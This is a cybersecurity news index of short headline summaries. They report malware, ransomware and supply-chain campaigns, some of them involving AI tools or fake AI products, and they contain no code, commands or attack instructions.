Malware Desk

Socket researchers expose a coordinated network of 152 Chrome 'live wallpaper' extensions stealing user data and generating fake Google organic search traffic.

Cybercriminals are using TikTok and Instagram Reels videos to distribute Vidar malware through fake software tutorials. One campaign accumulated over 100,000 views promoting 'free Spotify Premium' hacks.

Qilin's affiliate network hit healthcare, manufacturing, and critical infrastructure across nine countries in early June. The gang maintains 12-month dominance.

Attackers adopted orphaned AUR packages to push credential-stealing malware with kernel-level rootkit capabilities. Here's what Arch users need to do now.

BlackFog researchers detail OnyxC2 MaaS stealer pricing at $250/month. Targets browsers, crypto wallets, password managers with DLL sideloading delivery that bypasses VirusTotal detection.

Attackers exploited CVE-2026-26980 SQL injection in Ghost CMS to compromise 700+ websites including Harvard and Oxford, deploying ClickFix social engineering malware through fake CAPTCHA prompts.

Self-replicating Miasma malware compromises 73 Microsoft repositories across Azure, Microsoft, and MicrosoftDocs orgs. GitHub disables access as durabletask package gets reinfected.

GoDaddy researchers uncover campaign infecting 2,000 WordPress sites with malware that extracts commands from invisible Unicode characters in Steam Community comments.

Sophos discovers ransomware framework using Claude Opus 4.5 to automate EDR evasion and Active Directory discovery. Toolkit tested 80+ modules against Sophos, CrowdStrike, and Defender.

Unit 42 uncovers FlutterShell backdoor campaign targeting macOS users through Google-verified shell companies. Malware evades detection via WebView architecture and Apple notarization.

Fortinet exposes C0xmo, a modular Gafgyt variant exploiting CVE-2021-27137 in DD-WRT routers to recruit IoT devices for DDoS attacks while killing rival malware.

Sophos discovered a cryptocurrency miner bundled with Hola Browser for Windows. The malware creates a Windows service, adds Defender exclusions, and mines when idle.

New Magecart campaign stores payment card skimmer payloads in Stripe customer metadata, then exfiltrates stolen cards as fake customer records. CSP rules won't help.

New MaaS stealer ships encrypted browser data to attacker infrastructure for decryption, bypassing endpoint detection. Session hijacking with geo-matched proxies defeats MFA.

Malicious codexui-android npm package stole OpenAI refresh tokens from 29K developers. Mobile apps with 60K installs also compromised—revoke credentials now.

Malware-as-a-service infostealer spreads through malicious Minecraft mods promoted on YouTube. Steals browser credentials, crypto wallets, and Discord tokens.

32+ Red Hat Cloud Services npm packages compromised with Mini Shai-Hulud credential-stealing malware. 80K weekly downloads affected—here's what developers need to know.

New macOS infostealer SHub Reaper impersonates Apple, Microsoft, and Google software to steal passwords, crypto wallets, and iCloud data. Bypasses Tahoe 26.4 mitigations.

A fake Sicoob SDK on NuGet exfiltrated PFX certificates and banking credentials from Brazilian developers, while 14 malicious npm packages harvested AWS keys, Vault tokens, and CI/CD secrets.

Sysdig documents the first AI-agent-driven intrusion: attackers exploited Marimo CVE-2026-39987, then used an LLM agent to pivot through AWS and exfiltrate a PostgreSQL database in under an hour.

Daemon Tools, TanStack, and Nx Console all compromised via supply chain attacks. CVSS scores up to 9.5. CISA mandates federal remediation by June 10.

Attackers weaponize CVE-2026-35616 to deploy EKZ infostealer via FortiClient EMS management features. Fake Fortinet patch harvests browser passwords and cookies.

Malicious repository impersonating OpenAI's Privacy Filter reached 244,000 downloads before removal. Infostealer targeted Windows users via trending Hugging Face page.

Microsoft warns of active campaign using AI chatbot recommendations to distribute GPU mining malware. Attackers target high-end graphics card owners through fake utility downloads.

Malicious npm package mouse5212-super-formatter stole files from Claude AI's working directory. The attacker's own GitHub token was exposed in the code, allowing researchers to trace exfiltration.

New ransomware group Payload uses Babuk-derived code to target Windows and VMware ESXi systems. 12 victims across 7 countries within hours of launching leak site.

Supply chain attack deploys 34 malicious packages across npm, PyPI, and Crates.io to steal crypto wallets, SSH keys, and developer credentials. AI assistants weaponized.

Automated Megalodon campaign pushed 5,718 malicious commits to GitHub repos on May 18, injecting CI/CD workflows that exfiltrate cloud credentials, SSH keys, and secrets. SafeDep links it to TeamPCP.

Attackers compromised 700+ versions of Laravel-Lang PHP packages via tag poisoning, deploying a sophisticated stealer targeting cloud credentials, crypto wallets, and browser data. Packagist pulled affected versions.

Leaked Shai-Hulud malware source code fuels new npm supply chain attack. Four malicious packages steal credentials and deploy DDoS bot with TCP/UDP flood capabilities.

Attackers published malicious Nx Console 18.95.0 to VS Code Marketplace, stealing developer credentials via triple-channel exfiltration and Sigstore-signed npm package poisoning.

REMUS, a 64-bit Lumma Stealer successor, now offers session theft, EtherHiding blockchain C2, and full MaaS infrastructure targeting browser credentials and auth tokens.

SHub Reaper macOS infostealer bypasses Tahoe 26.4 defenses using applescript:// URLs, spoofs Apple, Google, and Microsoft to steal credentials and backdoor systems.

Attackers exploit unauthenticated vulnerability in Funnel Builder plugin to inject payment skimmers on 40,000+ WordPress stores. Patch to 3.15.0.3 immediately.

Attackers seized control of node-ipc by re-registering the maintainer's expired email domain. Three malicious versions now harvest AWS, GCP, Azure keys and more.

RubyGems suspended new account registration after attackers uploaded over 500 malicious packages in a coordinated spam attack targeting the Ruby package ecosystem.

Nitrogen ransomware gang claims 8TB of data including Apple, Nvidia, and Intel files from Foxconn's Wisconsin and Texas facilities. Fourth major ransomware incident for the electronics giant.

Hunt.io uncovers xlabs_v1, a Mirai-based botnet exploiting Android Debug Bridge on port 5555 to conscript IoT devices into a DDoS-for-hire service targeting game servers.

Pharma supplier West Pharmaceutical Services discloses ransomware attack in SEC filing. Attackers exfiltrated data before encrypting systems. Unit 42 investigating.

A new TrickMo variant routes Android trojan traffic through The Open Network, making domain takedowns ineffective. The malware adds SSH tunneling and SOCKS5 proxy capabilities for network pivoting.

TeamPCP compromised 84 versions across 42 TanStack packages on May 11 using GitHub Actions cache poisoning. The malware steals CI/CD credentials and includes a wiper that triggers on token revocation.

Five NuGet packages typosquatting popular Chinese .NET libraries have racked up 65,000 downloads while stealing browser credentials, crypto wallets, and SSH keys from developer machines.

Malvertising campaign abuses Google Ads and Claude.ai shared chats to deliver MacSync infostealer. Victims searching for Claude downloads get tricked into running malicious terminal commands.

Attackers exploited a CMS flaw on JDownloader's website to swap download links with trojanized installers. Windows users got a Python RAT; Linux users got root-persisted ELF binaries.

SentinelLABS uncovers PCPJack, a credential-stealing worm that removes TeamPCP infections before harvesting API keys from Docker, Kubernetes, and cloud services. Five CVEs enable worm-like spread.

A typosquatted OpenAI repository on Hugging Face delivered Rust-based infostealer malware to Windows users, racking up 244K downloads before removal.

NWHStealer spreads via fake gaming mods and TradingView scripts, using Bun JavaScript runtime and XOR-encrypted C2 to bypass security tools.

ESET exposes CallPhantom campaign: fraudulent Google Play apps promised call records for any number, delivered hardcoded fake data after payment.

Brazilian banking trojan TCLBanker targets 59 financial platforms using a trojanized Logitech installer. It hijacks WhatsApp Web and Outlook to self-propagate, while WPF overlays facilitate real-time fraud.

Kaspersky uncovered a supply chain attack on DAEMON Tools official website. Trojanized installers deployed QUIC RAT backdoors to thousands of systems, with a dozen government and manufacturing targets receiving advanced payloads.

New infostealer MicroStealer evades major antivirus while stealing browser credentials, crypto wallets, and Discord tokens from US and German organizations.

Three malicious versions of the xinference AI inference library were uploaded to PyPI, targeting cloud credentials and SSH keys from 680K+ users. TeamPCP claims a copycat is responsible.

Attackers compromised elementary-data version 0.23.3 on PyPI, pushing malicious code to 1.1 million monthly users. The infection extended to Docker images via automated workflows.

Securonix uncovers DEEP#DOOR, a Python-based backdoor that steals browser passwords, AWS/Azure credentials, and SSH keys while evading detection through bore.pub tunneling and extensive anti-analysis.

Go-based Sorry ransomware exploits cPanel auth bypass CVE-2026-41940, encrypting files with ChaCha20/RSA-2048. 44,000+ IPs compromised as attackers demand Tox ransom.

Four official SAP CAP ecosystem packages compromised on April 29, harvesting developer credentials, cloud secrets, and CI/CD tokens through malicious preinstall scripts.

TeamPCP threat actors backdoored versions 2.6.2 and 2.6.3 of the popular AI framework, harvesting SSH keys, cloud credentials, and GitHub tokens from millions of developers.

Malwarebytes uncovers campaign using fake TradingClaw website to distribute Needle Stealer malware. The infostealer hijacks browsers to harvest credentials, crypto wallets, and financial data from traders.

Socket researchers identify 73 malicious VS Code extensions on Open VSX tied to GlassWorm campaign. Six already activated to deliver malware through native binaries and obfuscated JavaScript.

Attackers use SEO poisoning to push malicious Claude Code installers to developers. The two-stage macOS malware steals credentials, crypto wallets, and establishes persistent backdoor access.

CISA and NCSC warn of Firestarter backdoor persisting on Cisco ASA and Firepower devices. The malware survives firmware updates and requires physical power disconnection to remove.

A malicious npm package hijacked Bitwarden CLI's publishing pipeline on April 22, harvesting credentials from 334 developers. Here's what happened.

Masjesu botnet, marketed via Telegram, exploits 12 vulnerabilities to conscript routers and IoT devices for DDoS attacks. Nearly 50% of traffic originates from Vietnam.

Akamai detects active exploitation of CVE-2025-29635 in discontinued D-Link DIR-823X routers. The tuxnokill variant spreads via command injection and launches DDoS attacks from compromised devices.

New Kyber ransomware operation uses NIST-standardized Kyber1024 encryption on Windows while targeting VMware ESXi with a separate variant. Rapid7 analysis reveals the ESXi version's claims are false.

Attackers are distributing PlugX malware through phishing campaigns impersonating Anthropic's Claude AI. The fake installer abuses a legitimate G DATA binary for DLL sideloading.

Kaspersky exposes Lotus, a data wiper deployed against Venezuela's energy utilities in December 2025. The malware destroys recovery mechanisms and leaves systems unrecoverable.

Threat actors pose as VCs on LinkedIn, share weaponized Obsidian vaults that silently deploy an AI-generated backdoor using blockchain C2 infrastructure.

New ransomware operation claims Medical Park Hospitals as first victim. 36 Turkish hospitals face data leak threats after 3.3TB exfiltration.

New ransomware operation linked to ex-BlackBasta affiliates runs Alpine Linux VMs on compromised hosts. Endpoint tools can't see inside the VM boundary.

Darktrace researchers expose ZionSiphon, OT malware designed to sabotage chlorine levels and pressure controls at Israeli desalination plants. A coding error currently prevents activation.

Multiple campaigns distribute NWHStealer infostealer through counterfeit Proton VPN installers, gaming modifications, and YouTube-promoted downloads. Targets browser data and 25+ crypto wallets.

Security researchers expose 108 malicious Chrome extensions operating under five fake publishers, stealing Google OAuth tokens, Telegram sessions, and injecting ads. Over 20,000 users affected.

eSentire researchers expose Omnistealer, a North Korean infostealer storing payloads in blockchain transactions. 300,000 credentials compromised across government and defense sectors.

ClickFix attackers bypass macOS 26.4 Terminal paste scanning by using applescript:// URLs to launch Script Editor. Same payload, new delivery vector.

Ransomware attack on ChipSoft forces 11 Dutch hospitals offline. The vendor manages patient records for most of the Netherlands. Attacker unknown.

Attackers compromised CPUID's website API for six hours, redirecting CPU-Z and HWMonitor downloads to trojanized installers that steal browser credentials using advanced evasion techniques.

Russian GRU's APT28 uses new PRISMEX malware suite with steganography and COM hijacking to target Ukraine defense and NATO logistics. Includes wiper capability.

Attackers compromised Nextend's update infrastructure to push a malicious Smart Slider 3 Pro version with four layers of backdoors. Here's who's affected and how to recover.

Contagious Interview campaign escalates with trojanized developer tools across five ecosystems. Packages impersonate logging utilities and steal credentials.

Over 1,000 exposed ComfyUI instances targeted by cryptomining campaign. Attackers exploit custom nodes for RCE, deploy XMRig and Hysteria V2 botnet with persistence.

Coordinated npm supply chain attack deploys 36 malicious packages masquerading as Strapi CMS plugins. Attackers target cryptocurrency platforms with Redis exploitation, credential harvesting, and persistent backdoors.

Brazilian threat actor Augmented Marauder targets Latin America and Europe with Casbaneiro banking trojan, using dynamically generated court summons PDFs and Horabot for worm-like propagation.

Microsoft Defender Experts identify multi-stage malware campaign using WhatsApp messages to deliver VBS scripts that bypass UAC and establish persistent Windows backdoors.

Security researchers expose KadNap malware targeting ASUS routers to build a criminal proxy network. 60% of infected devices located in the US, linked to Doppelganger service.

Kaspersky discovers new SparkCat malware variants on Apple App Store and Google Play that use OCR to steal cryptocurrency wallet recovery phrases from photo galleries.

Sinobi, a suspected Lynx/INC rebrand, has grown from 40 victims to 215 since September 2025. The RaaS operation targets US midmarket companies with hybrid Curve25519/AES encryption.

Threat actors weaponized Anthropic's accidental source code leak to distribute Vidar malware through trojanized GitHub repos. Here's how the attack works.

McAfee discovered NoVoice malware hiding in 50+ Google Play apps, using 22 exploits to root devices and clone WhatsApp sessions. Factory reset won't remove it.

New Storm infostealer bypasses Chrome's App-Bound Encryption by shipping encrypted credentials to attacker infrastructure for decryption. Endpoint tools can't detect it.

Kaspersky exposes CrystalX RAT, a new malware-as-a-service combining stealer, RAT, and prankware. It rotates screens, swaps mouse buttons, and drains crypto via clipboard hijacking.

New DeepLoad malware combines ClickFix delivery with AI-generated obfuscation to bypass security scanners. WMI persistence survives remediation for days.

Russian-linked AuraStealer infostealer operates 48 C2 domains, steals crypto wallets and 2FA tokens, and spreads through fake software activation videos on TikTok.

Attackers compromised the Axios npm package to deploy a cross-platform RAT targeting Windows, macOS, and Linux. Here's what happened and what you need to do.

TeamPCP compromised the popular telnyx Python SDK on PyPI, hiding credential-stealing malware inside WAV audio files. Versions 4.87.1 and 4.87.2 affected—downgrade immediately.

Malwarebytes researchers detected a Vidar infostealer campaign using fake CAPTCHA pages on compromised WordPress sites. ClickFix technique tricks users into running malicious PowerShell.

Attackers are posting thousands of fake Visual Studio Code vulnerability alerts in GitHub Discussions, using fabricated CVEs and urgent language to trick developers into downloading malware.

A new macOS infostealer combines ClickFix social engineering with Nuitka-compiled Python to evade detection. First documented campaign pairing these techniques.

A new payment skimmer uses WebRTC data channels instead of HTTP to exfiltrate stolen card data, bypassing Content Security Policy controls on Magento stores.

Fake copyright infringement notices target healthcare and government organizations in Germany and Canada with fileless PureLog Stealer malware. Campaign uses language-matched lures.

New Torg Grabber infostealer targets 728 cryptocurrency wallet extensions and 103 password managers. Spreads via ClickFix clipboard hijacking with Cloudflare-based exfiltration.

Stolen CI credentials from Trivy breach enabled TeamPCP to compromise Checkmarx KICS GitHub Actions, poisoning all 35 version tags with credential-stealing malware in four-hour window.

Malicious LiteLLM versions 1.82.7 and 1.82.8 deployed credential harvester, Kubernetes lateral movement tools, and persistent backdoor. Package sees 3 million daily downloads.

TeamPCP's supply chain attack expands with a Kubernetes wiper that detects Iranian systems via timezone and locale, wiping clusters while backdooring everyone else.

VoidStealer v2.0 becomes the first infostealer to extract Chrome's v20_master_key using hardware breakpoints. No injection or privilege escalation required.

TeamPCP threat actors hijacked Aqua Security's Trivy vulnerability scanner, compromising 75 GitHub Action tags and spreading credential-stealing malware to 47 npm packages via blockchain C2.

New infostealer parasitizes legitimate document security software, exfiltrating data through trusted server infrastructure. Targets include Dongfeng-27 ballistic missile documents.

GlassWorm campaign expands across Open VSX, npm, and GitHub with invisible Unicode payloads and Solana-based C2. Developers urged to audit dependencies immediately.

Multiple threat actors deploy DarkSword, a six-CVE iOS exploit chain stealing crypto wallets, credentials, and messages from millions of vulnerable iPhones.

Interlock ransomware operators weaponized Cisco Secure Firewall Management Center CVE-2026-20131 as a zero-day since January 26, gaining root access to enterprise networks.

LeakNet ransomware now uses ClickFix social engineering via hacked websites and a Deno-based in-memory loader to evade detection. Here's how the attack chain works.

Iran-linked hackers wiped tens of thousands of Stryker devices using Microsoft Intune's remote wipe feature. Here's what security teams should learn.

Three ClickFix campaigns target macOS users with MacSync infostealer disguised as ChatGPT and AI coding tools. Latest variant adds in-memory execution to evade detection.

Global campaign hijacks WordPress sites in 12 countries to serve fake Cloudflare CAPTCHAs that deploy Vidar, VodkaStealer, and other credential theft malware.

Russian-linked AuraStealer infostealer uses TikTok videos and 48 C2 domains to steal credentials. ABE bypass defeats Chrome's cookie encryption.

Storm-1811 actors flood inboxes with spam, then call via Microsoft Teams posing as IT support. Quick Assist grants access for A0Backdoor deployment.

GlassWorm supply chain attack spreads via 72 Open VSX extensions using invisible Unicode obfuscation. Targets crypto wallets, API tokens, and CI/CD pipelines.

Attackers compromised AppsFlyer's domain registrar to inject crypto-stealing JavaScript into their Web SDK. The malware swaps wallet addresses for Bitcoin, Ethereum, Solana, and more.

IBM X-Force discovers Hive0163 using LLM-generated Slopoly malware in Interlock ransomware attacks, marking a shift in how threat actors weaponize AI to accelerate malware development.

New Android trojan BeatBanker mines Monero while stealing banking credentials. Spreads via fake Starlink and government apps in Brazil.

New infostealer MicroStealer uses NSIS, Electron, and Java in a layered delivery chain that bypasses most security tools. Targets browser credentials and crypto wallets.

Researchers discovered five packages on crates.io masquerading as time utilities while exfiltrating developer credentials and API keys to attacker infrastructure.

New KadNap botnet targets Asus routers using peer-to-peer Kademlia protocol for stealth C2. Over 60% of infections in the US, linked to Faceless proxy service.

Ransomware affiliate Velvet Tempest uses ClickFix social engineering to deploy DonutLoader and CastleRAT in 12-day intrusion linked to Termite ransomware staging.

Multi-stage malware campaign uses Python loaders and Early Bird APC injection to deploy encrypted RATs. TryCloudflare tunnels mask C2 infrastructure.

A dormant JavaScript worm activated during a security review vandalized 4,000 Wikipedia pages in 23 minutes. Here's what happened and why it matters.

A dormant JavaScript worm activated during a Wikimedia security review modified 4,000 pages and infected 85 user scripts in 23 minutes before containment.

Malicious GitHub repositories exploiting Bing AI search results to distribute infostealers and GhostSocks proxy malware. Fake OpenClaw installers turn victims into residential proxies.

Supply chain attack targets PHP developers via fake Laravel utilities containing encrypted RAT payload. The malware gains full access to database credentials and API keys.

Russian-speaking developers behind AuraStealer infostealer scale infrastructure to 48 command-and-control domains, targeting 110+ browsers and 250+ extensions.

Security researchers uncover 26 malicious npm packages using steganography to hide command infrastructure in computer science essays. Famous Chollima cluster targets developers with RAT.

Updated CISA analysis reveals RESURGE implant uses advanced evasion techniques and can persist undetected on Ivanti Connect Secure devices until remote activation.

Malicious QuickLens browser add-on combines Google Lens functionality with ClickFix social engineering to drain cryptocurrency wallets through fake CAPTCHA prompts.

Trend Micro finds 2,200+ malicious skills weaponizing AI agents to deploy AMOS. The campaign marks a shift from prompt injection to using AI as a trusted intermediary for malware delivery.

New botnet loader stores encrypted commands in smart contracts on Polygon, making traditional infrastructure takedowns ineffective. Operating costs are under $1 for 100+ commands.

ReversingLabs caught StripeApi.Net typosquatting the official Stripe library. The package processed payments normally while exfiltrating API keys in the background.

Cisco Talos uncovers UAT-10027 deploying Dohdoor malware against American hospitals and schools. The backdoor uses DNS-over-HTTPS to evade detection.

Microsoft uncovers developer-targeting campaign using fake coding assessments to deliver JavaScript backdoors through VS Code automation triggers and Vercel-hosted payloads.

Huntress responds to ClickFix intrusion deploying Matanbuchus 3.0 and custom AstarionRAT. Attackers achieved lateral movement within 40 minutes.

Threat actors bypass ClawHub security by hiding Base64 payloads in fake troubleshooting comments. Atomic Stealer delivered to unsuspecting OpenClaw users.

Kaspersky exposes Arkanix Stealer, a Python and C++ infostealer likely built with LLM assistance. After two months of targeting crypto wallets and VPNs, the operation vanished.

Banking trojan disguised as IPTV streaming apps targets users in Portugal and Greece, enabling device takeover and credential theft through overlay attacks.

ESET discovers PromptSpy, the first Android malware weaponizing Google's Gemini AI to maintain persistence by analyzing UI and generating real-time tap instructions to stay pinned in recent apps.

Elastic Security Labs uncovers ClickFix campaign abusing compromised bincheck.io to deliver MIMICRAT, a custom C++ RAT with SOCKS5 tunneling and token impersonation capabilities.

SANS ISC analyzes DynoWiper's internals revealing Mersenne Twister seeding, 16-byte overwrite buffers, and directory exclusions. Technical breakdown of Sandworm's latest wiper.

Microsoft warns of ClickFix variant using nslookup commands to stage malware via DNS traffic. Delivers ModeloRAT through fileless attack chain.

Microsoft Defender Experts track expanding infostealer campaigns hitting macOS via ClickFix prompts, malicious DMG installers, and Python-based stealers. DigitStealer, MacSync, and AMOS lead the wave.

Cloud-native worm campaign by TeamPCP has compromised 60,000+ servers by exploiting Docker APIs, Kubernetes, and React2Shell. Flare researchers detail the industrialized operation.

Xavier Mertens discovers 846 images reusing the same Base64 steganography technique to deliver .NET malware via Equation Editor exploits. Here's how defenders can hunt for copycats.

Hudson Rock detects Vidar infostealer exfiltrating OpenClaw AI agent files for the first time. Stolen configs include gateway tokens and cryptographic keys.

CTM360 exposes 4,000+ malicious Google Groups delivering Lumma Stealer and Ninja Browser malware. Attackers pose as tech support in forums to bypass network detection.

Microsoft warns of ClickFix variant that deliberately crashes Chrome, then social-engineers victims into running PowerShell. Only domain-joined hosts targeted.

Researchers expose three Chrome extension campaigns stealing Meta Business Suite exports, VK accounts, and AI chatbot conversations from over 760,000 users.

New Linux botnet SSHStalker infected 7,000 cloud servers using brute-force SSH attacks and 2009-era kernel exploits. Uses IRC for command-and-control while apparently staging for future operations.

New ransomware family Reynolds embeds a vulnerable NsecSoft driver directly into its payload to disable CrowdStrike, Sophos, and other EDR tools before encryption begins.

Commercial mobile spyware on Telegram offers live surveillance, OTP interception, and crypto theft across Android 5-16 and iOS up to version 26.

BridgePay confirms ransomware attack crippled its payment processing platform, forcing merchants nationwide to cash-only. FBI and Secret Service are investigating.

Conpet, operator of 3,800km of Romanian oil pipelines, confirms cyberattack. Qilin claims 1TB of stolen data including financial records and passports.

Sophos finds 7,000+ servers with identical hostnames from ISPsystem VMmanager templates. LockBit, Qilin, and Conti all used the same bulletproof hosting VMs.

Rapid7 attributes the six-month Notepad++ supply chain compromise to Chinese APT Lotus Blossom, revealing a custom Chrysalis backdoor and three distinct infection chains.

Over 1,000 IPs exploit CVE-2025-55182 to inject malicious NGINX configs that redirect web traffic through attacker infrastructure, targeting Asian government and education sites.

Securonix uncovers multi-stage fileless campaign using IPFS-hosted VHD files and process injection into signed Windows binaries to deploy AsyncRAT.

SANS researcher uncovers multi-stage malware attack hiding XWorm payload inside a legitimate travel website image using steganography and obfuscated batch scripts.

Flare research finds enterprise identity compromise doubled in 2025, with Microsoft Entra ID appearing in 79% of logs. Session cookies enable MFA bypass at scale.

Russian-linked gang dumps executive emails, employee IDs, and banking communications in first airline sector attack of 2026.

Security researchers uncover ClawHavoc campaign distributing Atomic Stealer through fake cryptocurrency and productivity tools on ClawHub marketplace.

Security researchers expose an active campaign using layered evasion techniques to deliver Remcos RAT through MSBuild abuse and .NET Reactor-protected loaders.

Learn what ransomware is, how attacks work, the main types including double extortion, and practical steps to defend against this growing threat.

New campaign combines fake CAPTCHA pages with signed Microsoft scripts to bypass security tools and install Amatera infostealer on enterprise systems.

Two AI coding assistants on Microsoft's marketplace steal source code and credentials in real-time. Extensions use hidden iframes and analytics SDKs to profile developers.

New ransomware family employs BYOVD technique with POORTRY driver to disable endpoint protection. Evidence links operators to Inc ransomware campaigns.

The NexShield Chrome extension impersonated uBlock Origin's developer and used ClickFix techniques to deliver ModeloRAT malware to corporate networks.

Resecurity uncovers stealthy DLL-sideloading malware with APT-grade anti-VM tricks. Multiple ransomware groups now deploying it.

Budget Android TV boxes and tablets ship with backdoors from the factory, turning home networks into criminal infrastructure for ad fraud and proxy services.

Sophos exposes malvertising campaign that stayed dormant for 56 days before activating credential theft across 50+ fraudulent domains.

New Boto Cor-de-Rosa campaign uses Python-based worm module to auto-send malware through victims' WhatsApp contacts.

Cybercrime group uses fake software downloads and malicious Bing ads to deploy infostealer malware at scale across Chinese systems.

Multi-stage malware campaign uses text-based stagers and living-off-the-land binaries to deliver Remcos RAT to enterprise targets.

Five malicious extensions masquerading as HR tools steal authentication tokens, block security panels, and enable account takeover through cookie injection.

CyberArk exploited a vulnerability in the StealC infostealer's control panel to identify threat actors, steal session cookies, and track an operator who compromised 5,000 victims.

The initial access malware now delivers payloads through deliberately malformed archives that crash security tools while executing normally on Windows.

Check Point researchers expose a sophisticated cloud-native malware framework designed from the ground up to target AWS, Azure, GCP, and containerized environments.

A ransomware operation has compromised multiple US educational institutions using stolen VPN credentials. The education sector represents 80% of known victims.

A new ransomware group has compromised at least six healthcare organizations in Taiwan using BYOVD attacks to disable security software before encryption.

Two rogue browser extensions masquerading as AI tools exfiltrated complete conversation histories from ChatGPT and DeepSeek to attacker-controlled servers every 30 minutes.

A threat actor called RedTeam is selling a $1,500 credential-stuffing tool with built-in scanning, proxy rotation, and multi-protocol support aimed at enterprise VPN infrastructure.

The Russian-linked gang led all ransomware groups on January 6 with attacks spanning wine distributors, art logistics, and medical practices across three countries.

First macOS-focused wave of GlassWorm malware discovered on Open VSX marketplace, stealing cryptocurrency wallets, Keychain passwords, and developer credentials through trojanized extensions.

Hudson Rock research reveals 220 legitimate business websites hijacked for ClickFix malware attacks after admin credentials were stolen by infostealers.

Popular text editor's download page was hijacked for four days in December, serving trojanized installers that steal browser credentials and crypto wallets.

Nine-month-old botnet campaign pivots to exploit CVE-2025-55182 in Next.js, deploying cryptominers and Mirai variants across exposed instances.

The self-propagating VS Code extension worm now replaces Ledger Live and Trezor Suite with trojanized versions. Russian-speaking operators behind campaign.

A five-year investigation ends with extradition to South Korea. The 29-year-old allegedly infected 2.8 million Windows systems through trojanized software activation tools.

Chinese threat actor behind coordinated extension campaigns spanning seven years. Zoom Stealer component harvested corporate meeting credentials from 28 platforms.

New variant distributed as signed and notarized Swift app evades built-in security. Jamf Threat Labs traces evolution from ClickFix techniques to silent installer approach.

Supply chain attack disguised as working WhatsApp API library stole credentials, messages, and linked attacker devices to victim accounts. 56,000+ downloads since May.

Ransomware tracking data shows 63 total claims from 6 groups on December 26. LockBit's revival dominates holiday attack wave targeting reduced security staff.

Federal indictments target Tren de Aragua members who used Ploutus malware to steal over $40 million from U.S. ATMs since 2021.

Massive Android botnet targets set-top boxes and tablets, issued 1.7 billion attack commands in 3 days, briefly surpassing Google in DNS rankings.

Russian-developed infostealer now production-ready after December 16 release, targets browser credentials, crypto wallets, and messaging apps for $175/month.

New $150/month malware platform allows attackers to create weaponized versions of legitimate Android apps while maintaining full functionality.

Security researchers uncover sophisticated steganography attack concealing malicious JavaScript within PNG logo files of 17 Firefox browser extensions.